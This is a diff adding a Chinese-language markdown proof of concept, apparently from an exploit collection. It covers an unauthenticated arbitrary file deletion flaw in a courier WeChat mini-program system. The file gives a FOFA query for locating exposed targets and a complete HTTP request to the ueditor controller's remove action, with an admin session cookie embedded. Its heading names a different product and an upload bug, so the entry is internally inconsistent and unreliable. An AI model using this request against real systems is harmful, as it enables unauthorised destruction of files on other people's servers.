Update 快递微信小程序系统存在前台任意文件删除漏洞.md

wpoc/快递微信小程序系统/快递微信小程序系统存在前台任意文件删除漏洞.md

@@ -1 +1,36 @@
+# 华夏通讯录存在前台upload任意文件上传
 
+快递微信小程序系统 controller 接口存在任意文件删除漏洞，未经身份验证攻击者可通过该漏洞删除系统文件。
+
+## fofa
+
+```javascript
+body="/static/default/newwap/lang/js/jquery.localize.min.js"
+```
+
+## poc
+
+```javascript
+POST /public/qiniu_ueditor/php/controller.php?action=remove HTTP/2
+Host: 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: max-age=0
+Content-Length: 14
+Content-Type: application/x-www-form-urlencoded
+Cookie: think_var=zh-cn; PHPSESSID=5cg6kramfusrb94homfj2q7ku1; thinkphp_show_page_trace=0|0; admin=think%3A%7B%22admin_id%22%3A%221%22%2C%22type%22%3A%221%22%2C%22user_id%22%3A%221%22%2C%22username%22%3A%22admin%22%2C%22password%22%3A%2221232f297a57a5a743894a0e4a801fc3%22%2C%22role_id%22%3A%221%22%2C%22city_id%22%3A0%2C%22area_id%22%3A0%2C%22business_id%22%3A0%2C%22mobile%22%3A%2218888888888%22%2C%22lock_admin_mum%22%3A0%2C%22is_lock%22%3A%221%22%2C%22is_admin_lock%22%3A0%2C%22is_admin_lock_time%22%3A0%2C%22create_time%22%3A%221497679379%22%2C%22create_ip%22%3A%2227.13.26.84%22%2C%22last_time%22%3A%221603174799%22%2C%22last_ip%22%3A%2249.118.246.1%22%2C%22is_ip%22%3A0%2C%22is_username_lock%22%3A0%2C%22closed%22%3A0%2C%22role_name%22%3A%22%25E5%2585%25AC%25E5%258F%25B8%25E6%2580%25BB%25E9%2583%25A8%22%7D
+Origin: http://127.0.0.1
+Referer: http://127.0.0.1/public/qiniu_ueditor/php/controller.php?action=remove
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Sec-Ch-Ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Sec-Fetch-User: ?1
+
+key=./test.png
+```